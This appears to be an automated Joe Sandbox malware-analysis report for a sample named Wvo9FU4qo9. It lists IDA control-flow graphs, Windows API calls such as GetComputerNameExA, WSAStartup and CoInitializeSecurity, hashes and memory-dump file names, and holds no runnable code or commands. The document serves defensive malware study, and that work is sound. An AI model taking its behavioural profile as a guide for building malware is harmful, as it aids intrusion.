                                                                                                                • API String ID: 237503144-0
                                                                                                                • Opcode ID: edc7880480af47d407fde51a6c5e5c454170e2478d6b551bd50ea4f886be26ab
                                                                                                                • Instruction ID: 4b737a7ceb989c2a83331d1afa1066a3f279450a83adde2391a874455532bf86
                                                                                                                • Opcode Fuzzy Hash: edc7880480af47d407fde51a6c5e5c454170e2478d6b551bd50ea4f886be26ab
                                                                                                                • Instruction Fuzzy Hash: 9631E6E9F001405BE9057A3368A3ABF615B4BD171CF08142EF50A26383ED6DB91695AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                • Instruction ID: e45b450e8ddfff6189c4ab76d4d24a620daaf16e827674e15212a69d3e6124d1
                                                                                                                • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                • Instruction Fuzzy Hash: E421C537A627184BD3108E54DCC87917765E7D9328F3E86B8C9249F3D2C97BA91386C0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1055 4b9d1e-4b9d34 1056 4b9d40-4b9d52 1055->1056 1056->1056 1057 4b9d54-4b9d7e 1056->1057 1058 4b9d80-4b9d92 1057->1058 1058->1058 1059 4b9d94-4b9e13 LoadLibraryExW call 4ed960 1058->1059 1062 4b9e20-4b9e32 1059->1062 1062->1062 1063 4b9e34-4b9e5e 1062->1063 1064 4b9e60-4b9e72 1063->1064 1064->1064 1065 4b9e74-4b9e80 LoadLibraryExW call 4ed960 1064->1065 1067 4b9e85-4b9e98 1065->1067
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 004B9D98
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 004B9E78
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: CKT
                                                                                                                • API String ID: 1029625771-4061587880
                                                                                                                • Opcode ID: 620d0e6b3f78addb9619954eb89257dcbcce22e62936c04f925a68af00c9eb1d
                                                                                                                • Instruction ID: 0f9ae2bf61728c63f04045a6e03aca7e3e0a45b2c95fcbab013fd664ad643304
                                                                                                                • Opcode Fuzzy Hash: 620d0e6b3f78addb9619954eb89257dcbcce22e62936c04f925a68af00c9eb1d
                                                                                                                • Instruction Fuzzy Hash: 114122B4E003409FE7149F789CC2A9A7F71EB06324F41429DD5902F3A2C735981ACBE6

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1068 4dd7ee-4dd7f3 1069 4dd7f5-4dd7f9 1068->1069 1070 4dd813-4dd819 1068->1070 1071 4dd800-4dd809 1069->1071 1072 4dd896-4ddbfb FreeLibrary call 4efe00 1070->1072 1071->1071 1073 4dd80b-4dd80e 1071->1073 1077 4ddc00-4ddc12 1072->1077 1073->1072 1077->1077 1078 4ddc14-4ddc19 1077->1078 1079 4ddc2d 1078->1079 1080 4ddc1b-4ddc1f 1078->1080 1081 4ddc30-4ddc72 GetComputerNameExA 1079->1081 1082 4ddc20-4ddc29 1080->1082 1082->1082 1083 4ddc2b 1082->1083 1083->1081
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 004DD898
                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 004DDC43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                • String ID: ;87>
                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                • Opcode ID: 5478ef7aafba6170909120c87e3116d163d36667f48b76bb8387532618e3bd1a
                                                                                                                • Instruction ID: c862fbd13ef4e6f9cee61cde70790ce1e30824ad1029295e524e4dfc77b144ef
                                                                                                                • Opcode Fuzzy Hash: 5478ef7aafba6170909120c87e3116d163d36667f48b76bb8387532618e3bd1a
                                                                                                                • Instruction Fuzzy Hash: AA2128B05047428FDB228F39D860737BFE1AF57301F18869BD4D68B396D6389842DB55
                                                                                                                APIs
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 004BF09C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 28aff14a93824c79bde764227b453e28f9b292fb9ab2687a2285f1cdc2b9c082
                                                                                                                • Instruction ID: 99d7317ef2951d05865d9eabd0c2a01c1f1f8c5d286c391923e65c8d7a38400a
                                                                                                                • Opcode Fuzzy Hash: 28aff14a93824c79bde764227b453e28f9b292fb9ab2687a2285f1cdc2b9c082
                                                                                                                • Instruction Fuzzy Hash: FC41C6B4910B40AFD370EF39990B7137EB8AB05250F504B1EF9EA866D4E331A4198BD7
                                                                                                                APIs
                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 004DDD03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: 9102c8a6178a0e308f35f2635c14df3e974f0d088f42e3b9e06d3b40335b4fd2
                                                                                                                • Instruction ID: dcf86b7e599393755a3e04437d579d221ecd9a40e34c3b56bacf3a16d6bf0ced
                                                                                                                • Opcode Fuzzy Hash: 9102c8a6178a0e308f35f2635c14df3e974f0d088f42e3b9e06d3b40335b4fd2
                                                                                                                • Instruction Fuzzy Hash: 6B21A4705047918BD7268B24C460732BBE1BF5B704F1895DFD4D38B786CA78A446C766
                                                                                                                APIs
                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 004EE0E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: cd170c2ac302403ad436053d28137f2b40c72b8809006c3b51b778704ead548e
                                                                                                                • Instruction ID: 20cd6967ff0c1c912bc18a4c63b1a8262a2adef5423f1c0bcc762f1d819b0b17
                                                                                                                • Opcode Fuzzy Hash: cd170c2ac302403ad436053d28137f2b40c72b8809006c3b51b778704ead548e
                                                                                                                • Instruction Fuzzy Hash: 7FF0A072824261FBC2102F2ABD05A6B3AA4AFC2762F05043AF40056121DA39EC26C69A
                                                                                                                APIs
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004BECA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 640775948-0
                                                                                                                • Opcode ID: b26ce2665f7930618c4d536267b84bd6bbc2fcae0e8112e0a4b69325d3d82139
                                                                                                                • Instruction ID: aa6de898140bd0841473bdc24fa13ee6c1656971e63946268ff164884af6de25
                                                                                                                • Opcode Fuzzy Hash: b26ce2665f7930618c4d536267b84bd6bbc2fcae0e8112e0a4b69325d3d82139
                                                                                                                • Instruction Fuzzy Hash: E2E092343DA3827AF6798614DC63F2621165B82F29E306714B7253E3D4CBD43111800E
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: c69d6b76b8f0133e40c5b466772ae55e81ceeea89e0855340572e820ed427282
                                                                                                                • Instruction ID: 7eb74efdeef5cafdbec9a363934775726d2e3a73834b2c35facabd216eec5fce
                                                                                                                • Opcode Fuzzy Hash: c69d6b76b8f0133e40c5b466772ae55e81ceeea89e0855340572e820ed427282
                                                                                                                • Instruction Fuzzy Hash: 7DF0DAB4209701CFE344DF28D5A471ABBF0FB88304F10885CE4968B3A0CB75AA58CF82
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: c05f43524662f995b24839caf88fd0efd5b2073984088e31aba07388e40621e9
                                                                                                                • Instruction ID: 77702fecac514a037c97fd7f02f6749e4dcf466f3d0882611e2dbee19e0560a7
                                                                                                                • Opcode Fuzzy Hash: c05f43524662f995b24839caf88fd0efd5b2073984088e31aba07388e40621e9
                                                                                                                • Instruction Fuzzy Hash: F7F07A745083418FD314DF24C5A871BBBE0BB84308F10891DE5998B390C7B59559CF82
                                                                                                                APIs
                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 004B9ED2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Startup
                                                                                                                • String ID:
                                                                                                                • API String ID: 724789610-0
                                                                                                                • Opcode ID: 082a26bdbfbd95bc038937dce31465925cffb8236887c31f70dd89087e485fbb
                                                                                                                • Instruction ID: 0473881d8749e85769a7ef375932c9bb0736fa42db6d375406fd4a2953e99c8e
                                                                                                                • Opcode Fuzzy Hash: 082a26bdbfbd95bc038937dce31465925cffb8236887c31f70dd89087e485fbb
                                                                                                                • Instruction Fuzzy Hash: 1EE02B736406029BD700DB38FC47E693357DB553467068439E605C1171EA72A430DA14
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,004EE0F9), ref: 004EC590
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 4c879d11896cebc382b10f02faeeb223505864200bcf529e8ef86d2248a80d7c
                                                                                                                • Instruction ID: 22fc7de55699721c32fbfd81e1584d3e12663e7d8e6bff2927b47e0399df0a4a
                                                                                                                • Opcode Fuzzy Hash: 4c879d11896cebc382b10f02faeeb223505864200bcf529e8ef86d2248a80d7c
                                                                                                                • Instruction Fuzzy Hash: 78D01231415132FBC6102F29BC05BDB3B54DF59321F0708A2F444AA075CB25EC91DAD4
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 004EC561
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
